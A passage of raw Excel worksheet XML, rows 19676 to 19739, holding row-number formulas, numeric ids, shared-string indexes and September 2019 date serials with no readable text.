        <v>31510</v>
      </c>
      <c r="F19676" t="s">
        <v>9975</v>
      </c>
      <c r="G19676" t="s">
        <v>31511</v>
      </c>
    </row>
    <row r="19677" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19677">
        <f t="shared" si="307"/>
        <v>19676</v>
      </c>
      <c r="B19677">
        <v>4676</v>
      </c>
      <c r="C19677" t="s">
        <v>25497</v>
      </c>
      <c r="D19677" s="1">
        <v>43737</v>
      </c>
      <c r="E19677" t="s">
        <v>28812</v>
      </c>
      <c r="F19677" t="s">
        <v>9975</v>
      </c>
      <c r="G19677" t="s">
        <v>31512</v>
      </c>
    </row>
    <row r="19678" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19678">
        <f t="shared" si="307"/>
        <v>19677</v>
      </c>
      <c r="B19678">
        <v>4677</v>
      </c>
      <c r="C19678" t="s">
        <v>25497</v>
      </c>
      <c r="D19678" s="1">
        <v>43725</v>
      </c>
      <c r="E19678" t="s">
        <v>31513</v>
      </c>
      <c r="F19678" t="s">
        <v>10526</v>
      </c>
      <c r="G19678" t="s">
        <v>31514</v>
      </c>
    </row>
    <row r="19679" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19679">
        <f t="shared" si="307"/>
        <v>19678</v>
      </c>
      <c r="B19679">
        <v>4678</v>
      </c>
      <c r="C19679" t="s">
        <v>25497</v>
      </c>
      <c r="D19679" s="1">
        <v>43730</v>
      </c>
      <c r="E19679" t="s">
        <v>31515</v>
      </c>
      <c r="F19679" t="s">
        <v>9978</v>
      </c>
      <c r="G19679" t="s">
        <v>31516</v>
      </c>
    </row>
    <row r="19680" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19680">
        <f t="shared" si="307"/>
        <v>19679</v>
      </c>
      <c r="B19680">
        <v>4679</v>
      </c>
      <c r="C19680" t="s">
        <v>25497</v>
      </c>
      <c r="D19680" s="1">
        <v>43720</v>
      </c>
      <c r="F19680" t="s">
        <v>9975</v>
      </c>
      <c r="G19680" t="s">
        <v>31517</v>
      </c>
    </row>
    <row r="19681" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19681">
        <f t="shared" si="307"/>
        <v>19680</v>
      </c>
      <c r="B19681">
        <v>4680</v>
      </c>
      <c r="C19681" t="s">
        <v>25497</v>
      </c>
      <c r="D19681" s="1">
        <v>43728</v>
      </c>
      <c r="E19681" t="s">
        <v>25509</v>
      </c>
      <c r="F19681" t="s">
        <v>10021</v>
      </c>
      <c r="G19681" t="s">
        <v>31518</v>
      </c>
    </row>
    <row r="19682" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19682">
        <f t="shared" si="307"/>
        <v>19681</v>
      </c>
      <c r="B19682">
        <v>4681</v>
      </c>
      <c r="C19682" t="s">
        <v>25497</v>
      </c>
      <c r="D19682" s="1">
        <v>43724</v>
      </c>
      <c r="E19682" t="s">
        <v>31519</v>
      </c>
      <c r="F19682" t="s">
        <v>9975</v>
      </c>
      <c r="G19682" t="s">
        <v>31520</v>
      </c>
    </row>
    <row r="19683" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19683">
        <f t="shared" si="307"/>
        <v>19682</v>
      </c>
      <c r="B19683">
        <v>4682</v>
      </c>
      <c r="C19683" t="s">
        <v>25497</v>
      </c>
      <c r="D19683" s="1">
        <v>43712</v>
      </c>
      <c r="E19683" t="s">
        <v>25509</v>
      </c>
      <c r="F19683" t="s">
        <v>10021</v>
      </c>
      <c r="G19683" t="s">
        <v>31521</v>
      </c>
    </row>
    <row r="19684" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19684">
        <f t="shared" si="307"/>
        <v>19683</v>
      </c>
      <c r="B19684">
        <v>4683</v>
      </c>
      <c r="C19684" t="s">
        <v>25497</v>
      </c>
      <c r="D19684" s="1">
        <v>43726</v>
      </c>
      <c r="E19684" t="s">
        <v>31522</v>
      </c>
      <c r="F19684" t="s">
        <v>10021</v>
      </c>
      <c r="G19684" t="s">
        <v>31523</v>
      </c>
    </row>
    <row r="19685" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19685">
        <f t="shared" si="307"/>
        <v>19684</v>
      </c>
      <c r="B19685">
        <v>4684</v>
      </c>
      <c r="C19685" t="s">
        <v>25497</v>
      </c>
      <c r="D19685" s="1">
        <v>43738</v>
      </c>
      <c r="E19685" t="s">
        <v>31524</v>
      </c>
      <c r="F19685" t="s">
        <v>9975</v>
      </c>
      <c r="G19685" t="s">
        <v>31525</v>
      </c>
    </row>
    <row r="19686" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19686">
        <f t="shared" si="307"/>
        <v>19685</v>
      </c>
      <c r="B19686">
        <v>4685</v>
      </c>
      <c r="C19686" t="s">
        <v>25497</v>
      </c>
      <c r="D19686" s="1">
        <v>43728</v>
      </c>
      <c r="E19686" t="s">
        <v>31526</v>
      </c>
      <c r="F19686" t="s">
        <v>9975</v>
      </c>
      <c r="G19686" t="s">
        <v>31527</v>
      </c>
    </row>
    <row r="19687" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19687">
        <f t="shared" si="307"/>
        <v>19686</v>
      </c>
      <c r="B19687">
        <v>4686</v>
      </c>
      <c r="C19687" t="s">
        <v>25497</v>
      </c>
      <c r="D19687" s="1">
        <v>43713</v>
      </c>
      <c r="F19687" t="s">
        <v>10021</v>
      </c>
      <c r="G19687" t="s">
        <v>31528</v>
      </c>
    </row>
    <row r="19688" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19688">
        <f t="shared" si="307"/>
        <v>19687</v>
      </c>
      <c r="B19688">
        <v>4687</v>
      </c>
      <c r="C19688" t="s">
        <v>25497</v>
      </c>
      <c r="D19688" s="1">
        <v>43726</v>
      </c>
      <c r="E19688" t="s">
        <v>31529</v>
      </c>
      <c r="F19688" t="s">
        <v>9975</v>
      </c>
      <c r="G19688" t="s">
        <v>31530</v>
      </c>
    </row>
    <row r="19689" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19689">
        <f t="shared" si="307"/>
        <v>19688</v>
      </c>
      <c r="B19689">
        <v>4688</v>
      </c>
      <c r="C19689" t="s">
        <v>25497</v>
      </c>
      <c r="D19689" s="1">
        <v>43738</v>
      </c>
      <c r="F19689" t="s">
        <v>9975</v>
      </c>
      <c r="G19689" t="s">
        <v>31531</v>
      </c>
    </row>
    <row r="19690" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19690">
        <f t="shared" si="307"/>
        <v>19689</v>
      </c>
      <c r="B19690">
        <v>4689</v>
      </c>
      <c r="C19690" t="s">
        <v>25497</v>
      </c>
      <c r="D19690" s="1">
        <v>43733</v>
      </c>
      <c r="E19690" t="s">
        <v>25517</v>
      </c>
      <c r="F19690" t="s">
        <v>9975</v>
      </c>
      <c r="G19690" t="s">
        <v>31532</v>
      </c>
    </row>
    <row r="19691" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19691">
        <f t="shared" si="307"/>
        <v>19690</v>
      </c>
      <c r="B19691">
        <v>4690</v>
      </c>
      <c r="C19691" t="s">
        <v>25497</v>
      </c>
      <c r="D19691" s="1">
        <v>43733</v>
      </c>
      <c r="F19691" t="s">
        <v>9978</v>
      </c>
      <c r="G19691" t="s">
        <v>31533</v>
      </c>
    </row>
    <row r="19692" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19692">
        <f t="shared" si="307"/>
        <v>19691</v>
      </c>
      <c r="B19692">
        <v>4691</v>
      </c>
      <c r="C19692" t="s">
        <v>25497</v>
      </c>
      <c r="D19692" s="1">
        <v>43734</v>
      </c>
      <c r="E19692" t="s">
        <v>31534</v>
      </c>
      <c r="F19692" t="s">
        <v>9975</v>
      </c>
      <c r="G19692" t="s">
        <v>31535</v>
      </c>
    </row>
    <row r="19693" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19693">
        <f t="shared" si="307"/>
        <v>19692</v>
      </c>
      <c r="B19693">
        <v>4692</v>
      </c>
      <c r="C19693" t="s">
        <v>25497</v>
      </c>
      <c r="D19693" s="1">
        <v>43733</v>
      </c>
      <c r="E19693" t="s">
        <v>31536</v>
      </c>
      <c r="F19693" t="s">
        <v>9978</v>
      </c>
      <c r="G19693" t="s">
        <v>31537</v>
      </c>
    </row>
    <row r="19694" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19694">
        <f t="shared" si="307"/>
        <v>19693</v>
      </c>
      <c r="B19694">
        <v>4693</v>
      </c>
      <c r="C19694" t="s">
        <v>25497</v>
      </c>
      <c r="D19694" s="1">
        <v>43735</v>
      </c>
      <c r="F19694" t="s">
        <v>9975</v>
      </c>
      <c r="G19694" t="s">
        <v>31538</v>
      </c>
    </row>
    <row r="19695" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19695">
        <f t="shared" si="307"/>
        <v>19694</v>
      </c>
      <c r="B19695">
        <v>4694</v>
      </c>
      <c r="C19695" t="s">
        <v>25497</v>
      </c>
      <c r="D19695" s="1">
        <v>43720</v>
      </c>
      <c r="E19695" t="s">
        <v>31539</v>
      </c>
      <c r="F19695" t="s">
        <v>10021</v>
      </c>
      <c r="G19695" t="s">
        <v>31540</v>
      </c>
    </row>
    <row r="19696" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19696">
        <f t="shared" si="307"/>
        <v>19695</v>
      </c>
      <c r="B19696">
        <v>4695</v>
      </c>
      <c r="C19696" t="s">
        <v>25497</v>
      </c>
      <c r="D19696" s="1">
        <v>43714</v>
      </c>
      <c r="E19696" t="s">
        <v>25886</v>
      </c>
      <c r="F19696" t="s">
        <v>9975</v>
      </c>
      <c r="G19696" t="s">
        <v>31541</v>
      </c>
    </row>
    <row r="19697" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19697">
        <f t="shared" si="307"/>
        <v>19696</v>
      </c>
      <c r="B19697">
        <v>4696</v>
      </c>
      <c r="C19697" t="s">
        <v>25497</v>
      </c>
      <c r="D19697" s="1">
        <v>43728</v>
      </c>
      <c r="E19697" t="s">
        <v>25502</v>
      </c>
      <c r="F19697" t="s">
        <v>9975</v>
      </c>
      <c r="G19697" t="s">
        <v>31542</v>
      </c>
    </row>
    <row r="19698" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19698">
        <f t="shared" si="307"/>
        <v>19697</v>
      </c>
      <c r="B19698">
        <v>4697</v>
      </c>
      <c r="C19698" t="s">
        <v>25497</v>
      </c>
      <c r="D19698" s="1">
        <v>43720</v>
      </c>
      <c r="F19698" t="s">
        <v>9975</v>
      </c>
      <c r="G19698" t="s">
        <v>31543</v>
      </c>
    </row>
    <row r="19699" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19699">
        <f t="shared" si="307"/>
        <v>19698</v>
      </c>
      <c r="B19699">
        <v>4698</v>
      </c>
      <c r="C19699" t="s">
        <v>25497</v>
      </c>
      <c r="D19699" s="1">
        <v>43729</v>
      </c>
      <c r="F19699" t="s">
        <v>9975</v>
      </c>
      <c r="G19699" t="s">
        <v>31544</v>
      </c>
    </row>
    <row r="19700" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19700">
        <f t="shared" si="307"/>
        <v>19699</v>
      </c>
      <c r="B19700">
        <v>4699</v>
      </c>
      <c r="C19700" t="s">
        <v>25497</v>
      </c>
      <c r="D19700" s="1">
        <v>43717</v>
      </c>
      <c r="E19700" t="s">
        <v>31545</v>
      </c>
      <c r="F19700" t="s">
        <v>9975</v>
      </c>
      <c r="G19700" t="s">
        <v>31546</v>
      </c>
    </row>
    <row r="19701" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19701">
        <f t="shared" si="307"/>
        <v>19700</v>
      </c>
      <c r="B19701">
        <v>4700</v>
      </c>
      <c r="C19701" t="s">
        <v>25497</v>
      </c>
      <c r="D19701" s="1">
        <v>43732</v>
      </c>
      <c r="E19701" t="s">
        <v>25592</v>
      </c>
      <c r="F19701" t="s">
        <v>9975</v>
      </c>
      <c r="G19701" t="s">
        <v>31547</v>
      </c>
    </row>
    <row r="19702" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19702">
        <f t="shared" si="307"/>
        <v>19701</v>
      </c>
      <c r="B19702">
        <v>4701</v>
      </c>
      <c r="C19702" t="s">
        <v>25497</v>
      </c>
      <c r="D19702" s="1">
        <v>43718</v>
      </c>
      <c r="E19702" t="s">
        <v>31548</v>
      </c>
      <c r="F19702" t="s">
        <v>10021</v>
      </c>
      <c r="G19702" t="s">
        <v>31549</v>
      </c>
    </row>
    <row r="19703" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19703">
        <f t="shared" si="307"/>
        <v>19702</v>
      </c>
      <c r="B19703">
        <v>4702</v>
      </c>
      <c r="C19703" t="s">
        <v>25497</v>
      </c>
      <c r="D19703" s="1">
        <v>43737</v>
      </c>
      <c r="E19703" t="s">
        <v>25774</v>
      </c>
      <c r="F19703" t="s">
        <v>9975</v>
      </c>
      <c r="G19703" t="s">
        <v>31550</v>
      </c>
    </row>
    <row r="19704" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19704">
        <f t="shared" si="307"/>
        <v>19703</v>
      </c>
      <c r="B19704">
        <v>4703</v>
      </c>
      <c r="C19704" t="s">
        <v>25497</v>
      </c>
      <c r="D19704" s="1">
        <v>43725</v>
      </c>
      <c r="E19704" t="s">
        <v>25517</v>
      </c>
      <c r="F19704" t="s">
        <v>9975</v>
      </c>
      <c r="G19704" t="s">
        <v>31551</v>
      </c>
    </row>
    <row r="19705" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19705">
        <f t="shared" si="307"/>
        <v>19704</v>
      </c>
      <c r="B19705">
        <v>4704</v>
      </c>
      <c r="C19705" t="s">
        <v>25497</v>
      </c>
      <c r="D19705" s="1">
        <v>43724</v>
      </c>
      <c r="E19705" t="s">
        <v>31552</v>
      </c>
      <c r="F19705" t="s">
        <v>9975</v>
      </c>
      <c r="G19705" t="s">
        <v>31553</v>
      </c>
    </row>
    <row r="19706" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19706">
        <f t="shared" si="307"/>
        <v>19705</v>
      </c>
      <c r="B19706">
        <v>4705</v>
      </c>
      <c r="C19706" t="s">
        <v>25497</v>
      </c>
      <c r="D19706" s="1">
        <v>43723</v>
      </c>
      <c r="E19706" t="s">
        <v>25504</v>
      </c>
      <c r="F19706" t="s">
        <v>9975</v>
      </c>
      <c r="G19706" t="s">
        <v>31554</v>
      </c>
    </row>
    <row r="19707" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19707">
        <f t="shared" si="307"/>
        <v>19706</v>
      </c>
      <c r="B19707">
        <v>4706</v>
      </c>
      <c r="C19707" t="s">
        <v>25497</v>
      </c>
      <c r="D19707" s="1">
        <v>43732</v>
      </c>
      <c r="F19707" t="s">
        <v>9975</v>
      </c>
      <c r="G19707" t="s">
        <v>31555</v>
      </c>
    </row>
    <row r="19708" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19708">
        <f t="shared" si="307"/>
        <v>19707</v>
      </c>
      <c r="B19708">
        <v>4707</v>
      </c>
      <c r="C19708" t="s">
        <v>25497</v>
      </c>
      <c r="D19708" s="1">
        <v>43738</v>
      </c>
      <c r="F19708" t="s">
        <v>9975</v>
      </c>
      <c r="G19708" t="s">
        <v>31556</v>
      </c>
    </row>
    <row r="19709" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19709">
        <f t="shared" si="307"/>
        <v>19708</v>
      </c>
      <c r="B19709">
        <v>4708</v>
      </c>
      <c r="C19709" t="s">
        <v>25497</v>
      </c>
      <c r="D19709" s="1">
        <v>43713</v>
      </c>
      <c r="F19709" t="s">
        <v>9975</v>
      </c>
      <c r="G19709" t="s">
        <v>31557</v>
      </c>
    </row>
    <row r="19710" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19710">
        <f t="shared" si="307"/>
        <v>19709</v>
      </c>
      <c r="B19710">
        <v>4709</v>
      </c>
      <c r="C19710" t="s">
        <v>25497</v>
      </c>
      <c r="D19710" s="1">
        <v>43711</v>
      </c>
      <c r="E19710" t="s">
        <v>31558</v>
      </c>
      <c r="F19710" t="s">
        <v>9975</v>
      </c>
      <c r="G19710" t="s">
        <v>31559</v>
      </c>
    </row>
    <row r="19711" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19711">
        <f t="shared" si="307"/>
        <v>19710</v>
      </c>
      <c r="B19711">
        <v>4710</v>
      </c>
      <c r="C19711" t="s">
        <v>25497</v>
      </c>
      <c r="D19711" s="1">
        <v>43731</v>
      </c>
      <c r="F19711" t="s">
        <v>9975</v>
      </c>
      <c r="G19711" t="s">
        <v>31560</v>
      </c>
    </row>
    <row r="19712" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19712">
        <f t="shared" si="307"/>
        <v>19711</v>
      </c>
      <c r="B19712">
        <v>4711</v>
      </c>
      <c r="C19712" t="s">
        <v>25497</v>
      </c>
      <c r="D19712" s="1">
        <v>43727</v>
      </c>
      <c r="E19712" t="s">
        <v>25707</v>
      </c>
      <c r="F19712" t="s">
        <v>9978</v>
      </c>
      <c r="G19712" t="s">
        <v>31561</v>
      </c>
    </row>
    <row r="19713" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19713">
        <f t="shared" si="307"/>
        <v>19712</v>
      </c>
      <c r="B19713">
        <v>4712</v>
      </c>
      <c r="C19713" t="s">
        <v>25497</v>
      </c>
      <c r="D19713" s="1">
        <v>43717</v>
      </c>
      <c r="E19713" t="s">
        <v>31562</v>
      </c>
      <c r="F19713" t="s">
        <v>9975</v>
      </c>
      <c r="G19713" t="s">
        <v>31563</v>
      </c>
    </row>
    <row r="19714" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19714">
        <f t="shared" si="307"/>
        <v>19713</v>
      </c>
      <c r="B19714">
        <v>4713</v>
      </c>
      <c r="C19714" t="s">
        <v>25497</v>
      </c>
      <c r="D19714" s="1">
        <v>43736</v>
      </c>
      <c r="E19714" t="s">
        <v>25881</v>
      </c>
      <c r="F19714" t="s">
        <v>9975</v>
      </c>
      <c r="G19714" t="s">
        <v>31564</v>
      </c>
    </row>
    <row r="19715" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19715">
        <f t="shared" ref="A19715:A19778" si="308">+ROW(A19714)</f>
        <v>19714</v>
      </c>
      <c r="B19715">
        <v>4714</v>
      </c>
      <c r="C19715" t="s">
        <v>25497</v>
      </c>
      <c r="D19715" s="1">
        <v>43720</v>
      </c>
      <c r="E19715" t="s">
        <v>31565</v>
      </c>
      <c r="F19715" t="s">
        <v>9975</v>
      </c>
      <c r="G19715" t="s">
        <v>31566</v>
      </c>
    </row>
    <row r="19716" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19716">
        <f t="shared" si="308"/>
        <v>19715</v>
      </c>
      <c r="B19716">
        <v>4715</v>
      </c>
      <c r="C19716" t="s">
        <v>25497</v>
      </c>
      <c r="D19716" s="1">
        <v>43711</v>
      </c>
      <c r="E19716" t="s">
        <v>31567</v>
      </c>
      <c r="F19716" t="s">
        <v>9975</v>
      </c>
      <c r="G19716" t="s">
        <v>31568</v>
      </c>
    </row>
    <row r="19717" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19717">
        <f t="shared" si="308"/>
        <v>19716</v>
      </c>
      <c r="B19717">
        <v>4716</v>
      </c>
      <c r="C19717" t="s">
        <v>25497</v>
      </c>
      <c r="D19717" s="1">
        <v>43725</v>
      </c>
      <c r="F19717" t="s">
        <v>9975</v>
      </c>
      <c r="G19717" t="s">
        <v>31569</v>
      </c>
    </row>
    <row r="19718" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19718">
        <f t="shared" si="308"/>
        <v>19717</v>
      </c>
      <c r="B19718">
        <v>4717</v>
      </c>
      <c r="C19718" t="s">
        <v>25497</v>
      </c>
      <c r="D19718" s="1">
        <v>43712</v>
      </c>
      <c r="E19718" t="s">
        <v>25504</v>
      </c>
      <c r="F19718" t="s">
        <v>9975</v>
      </c>
      <c r="G19718" t="s">
        <v>31570</v>
      </c>
    </row>
    <row r="19719" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19719">
        <f t="shared" si="308"/>
        <v>19718</v>
      </c>
      <c r="B19719">
        <v>4718</v>
      </c>
      <c r="C19719" t="s">
        <v>25497</v>
      </c>
      <c r="D19719" s="1">
        <v>43733</v>
      </c>
      <c r="E19719" t="s">
        <v>25517</v>
      </c>
      <c r="F19719" t="s">
        <v>9975</v>
      </c>
      <c r="G19719" t="s">
        <v>31571</v>
      </c>
    </row>
    <row r="19720" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19720">
        <f t="shared" si="308"/>
        <v>19719</v>
      </c>
      <c r="B19720">
        <v>4719</v>
      </c>
      <c r="C19720" t="s">
        <v>25497</v>
      </c>
      <c r="D19720" s="1">
        <v>43733</v>
      </c>
      <c r="E19720" t="s">
        <v>19705</v>
      </c>
      <c r="F19720" t="s">
        <v>9975</v>
      </c>
      <c r="G19720" t="s">
        <v>31572</v>
      </c>
    </row>
    <row r="19721" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19721">
        <f t="shared" si="308"/>
        <v>19720</v>
      </c>
      <c r="B19721">
        <v>4720</v>
      </c>
      <c r="C19721" t="s">
        <v>25497</v>
      </c>
      <c r="D19721" s="1">
        <v>43734</v>
      </c>
      <c r="F19721" t="s">
        <v>9975</v>
      </c>
      <c r="G19721" t="s">
        <v>31573</v>
      </c>
    </row>
    <row r="19722" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19722">
        <f t="shared" si="308"/>
        <v>19721</v>
      </c>
      <c r="B19722">
        <v>4721</v>
      </c>
      <c r="C19722" t="s">
        <v>25497</v>
      </c>
      <c r="D19722" s="1">
        <v>43710</v>
      </c>
      <c r="E19722" t="s">
        <v>31574</v>
      </c>
      <c r="F19722" t="s">
        <v>9975</v>
      </c>
      <c r="G19722" t="s">
        <v>31575</v>
      </c>
    </row>
    <row r="19723" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19723">
        <f t="shared" si="308"/>
        <v>19722</v>
      </c>
      <c r="B19723">
        <v>4722</v>
      </c>
      <c r="C19723" t="s">
        <v>25497</v>
      </c>
      <c r="D19723" s="1">
        <v>43720</v>
      </c>
      <c r="E19723" t="s">
        <v>25517</v>
      </c>
      <c r="F19723" t="s">
        <v>9975</v>
      </c>
      <c r="G19723" t="s">
        <v>31576</v>
      </c>
    </row>
    <row r="19724" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19724">
        <f t="shared" si="308"/>
        <v>19723</v>
      </c>
      <c r="B19724">
        <v>4723</v>
      </c>
      <c r="C19724" t="s">
        <v>25497</v>
      </c>
      <c r="D19724" s="1">
        <v>43728</v>
      </c>
      <c r="F19724" t="s">
        <v>9975</v>
      </c>
      <c r="G19724" t="s">
        <v>31577</v>
      </c>
    </row>
    <row r="19725" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19725">
        <f t="shared" si="308"/>
        <v>19724</v>
      </c>
      <c r="B19725">
        <v>4724</v>
      </c>
      <c r="C19725" t="s">
        <v>25497</v>
      </c>
      <c r="D19725" s="1">
        <v>43720</v>
      </c>
      <c r="E19725" t="s">
        <v>27044</v>
      </c>
      <c r="F19725" t="s">
        <v>9975</v>
      </c>
      <c r="G19725" t="s">
        <v>31578</v>
      </c>
    </row>
    <row r="19726" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19726">
        <f t="shared" si="308"/>
        <v>19725</v>
      </c>
      <c r="B19726">
        <v>4725</v>
      </c>
      <c r="C19726" t="s">
        <v>25497</v>
      </c>
      <c r="D19726" s="1">
        <v>43711</v>
      </c>
      <c r="F19726" t="s">
        <v>9975</v>
      </c>
      <c r="G19726" t="s">
        <v>31579</v>
      </c>
    </row>
    <row r="19727" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19727">
        <f t="shared" si="308"/>
        <v>19726</v>
      </c>
      <c r="B19727">
        <v>4726</v>
      </c>
      <c r="C19727" t="s">
        <v>25497</v>
      </c>
      <c r="D19727" s="1">
        <v>43713</v>
      </c>
      <c r="E19727" t="s">
        <v>31580</v>
      </c>
      <c r="F19727" t="s">
        <v>10526</v>
      </c>
      <c r="G19727" t="s">
        <v>31581</v>
      </c>
    </row>
    <row r="19728" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19728">
        <f t="shared" si="308"/>
        <v>19727</v>
      </c>
      <c r="B19728">
        <v>4727</v>
      </c>
      <c r="C19728" t="s">
        <v>25497</v>
      </c>
      <c r="D19728" s="1">
        <v>43721</v>
      </c>
      <c r="F19728" t="s">
        <v>9975</v>
      </c>
      <c r="G19728" t="s">
        <v>31582</v>
      </c>
    </row>
    <row r="19729" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19729">
        <f t="shared" si="308"/>
        <v>19728</v>
      </c>
      <c r="B19729">
        <v>4728</v>
      </c>
      <c r="C19729" t="s">
        <v>25497</v>
      </c>
      <c r="D19729" s="1">
        <v>43727</v>
      </c>
      <c r="E19729" t="s">
        <v>31583</v>
      </c>
      <c r="F19729" t="s">
        <v>9975</v>
      </c>
      <c r="G19729" t="s">
        <v>31584</v>
      </c>
    </row>
    <row r="19730" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19730">
        <f t="shared" si="308"/>
        <v>19729</v>
      </c>
      <c r="B19730">
        <v>4729</v>
      </c>
      <c r="C19730" t="s">
        <v>25497</v>
      </c>
      <c r="D19730" s="1">
        <v>43709</v>
      </c>
      <c r="F19730" t="s">
        <v>9975</v>
      </c>
      <c r="G19730" t="s">
        <v>31585</v>
      </c>
    </row>
    <row r="19731" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19731">
        <f t="shared" si="308"/>
        <v>19730</v>
      </c>
      <c r="B19731">
        <v>4730</v>
      </c>
      <c r="C19731" t="s">
        <v>25497</v>
      </c>
      <c r="D19731" s="1">
        <v>43713</v>
      </c>
      <c r="F19731" t="s">
        <v>9975</v>
      </c>
      <c r="G19731" t="s">
        <v>31586</v>
      </c>
    </row>
    <row r="19732" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19732">
        <f t="shared" si="308"/>
        <v>19731</v>
      </c>
      <c r="B19732">
        <v>4731</v>
      </c>
      <c r="C19732" t="s">
        <v>25497</v>
      </c>
      <c r="D19732" s="1">
        <v>43729</v>
      </c>
      <c r="E19732" t="s">
        <v>25509</v>
      </c>
      <c r="F19732" t="s">
        <v>9975</v>
      </c>
      <c r="G19732" t="s">
        <v>31587</v>
      </c>
    </row>
    <row r="19733" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19733">
        <f t="shared" si="308"/>
        <v>19732</v>
      </c>
      <c r="B19733">
        <v>4732</v>
      </c>
      <c r="C19733" t="s">
        <v>25497</v>
      </c>
      <c r="D19733" s="1">
        <v>43734</v>
      </c>
      <c r="E19733" t="s">
        <v>25509</v>
      </c>
      <c r="F19733" t="s">
        <v>10021</v>
      </c>
      <c r="G19733" t="s">
        <v>31588</v>
      </c>
    </row>
    <row r="19734" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19734">
        <f t="shared" si="308"/>
        <v>19733</v>
      </c>
      <c r="B19734">
        <v>4733</v>
      </c>
      <c r="C19734" t="s">
        <v>25497</v>
      </c>
      <c r="D19734" s="1">
        <v>43729</v>
      </c>
      <c r="E19734" t="s">
        <v>31589</v>
      </c>
      <c r="F19734" t="s">
        <v>9975</v>
      </c>
      <c r="G19734" t="s">
        <v>31590</v>
      </c>
    </row>
    <row r="19735" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19735">
        <f t="shared" si="308"/>
        <v>19734</v>
      </c>
      <c r="B19735">
        <v>4734</v>
      </c>
      <c r="C19735" t="s">
        <v>25497</v>
      </c>
      <c r="D19735" s="1">
        <v>43723</v>
      </c>
      <c r="E19735" t="s">
        <v>31591</v>
      </c>
      <c r="F19735" t="s">
        <v>10021</v>
      </c>
      <c r="G19735" t="s">
        <v>31592</v>
      </c>
    </row>
    <row r="19736" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19736">
        <f t="shared" si="308"/>
        <v>19735</v>
      </c>
      <c r="B19736">
        <v>4735</v>
      </c>
      <c r="C19736" t="s">
        <v>25497</v>
      </c>
      <c r="D19736" s="1">
        <v>43726</v>
      </c>
      <c r="E19736" t="s">
        <v>31593</v>
      </c>
      <c r="F19736" t="s">
        <v>10021</v>
      </c>
      <c r="G19736" t="s">
        <v>31594</v>
      </c>
    </row>
    <row r="19737" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19737">
        <f t="shared" si="308"/>
        <v>19736</v>
      </c>
      <c r="B19737">
        <v>4736</v>
      </c>
      <c r="C19737" t="s">
        <v>25497</v>
      </c>
      <c r="D19737" s="1">
        <v>43711</v>
      </c>
      <c r="E19737" t="s">
        <v>25517</v>
      </c>
      <c r="F19737" t="s">
        <v>9975</v>
      </c>
      <c r="G19737" t="s">
        <v>31595</v>
      </c>
    </row>
    <row r="19738" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19738">
        <f t="shared" si="308"/>
        <v>19737</v>
      </c>
      <c r="B19738">
        <v>4737</v>
      </c>
      <c r="C19738" t="s">
        <v>25497</v>
      </c>
      <c r="D19738" s="1">
        <v>43715</v>
      </c>
      <c r="F19738" t="s">
        <v>9975</v>
      </c>
      <c r="G19738" t="s">
        <v>31596</v>
      </c>
    </row>
    <row r="19739" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19739">
        <f t="shared" si="308"/>
        <v>19738</v>
      </c>
      <c r="B19739">
        <v>4738</v>
      </c>
      <c r="C19739" t="s">
        <v>25497</v>
      </c>
      <c r="D19739" s="1">
        <v>43722</v>
      </c>
      <c r="E19739" t="s">
        <v>25642</v>
      </c>
      <c r="F19739" t="s">
